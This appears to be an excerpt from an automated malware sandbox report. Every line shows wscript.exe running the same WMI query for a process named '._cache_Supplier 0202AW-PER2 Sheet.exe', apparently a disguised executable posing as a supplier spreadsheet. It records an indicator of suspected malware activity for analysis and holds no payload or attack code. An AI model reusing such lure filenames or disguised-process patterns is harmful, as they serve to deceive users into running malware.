                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
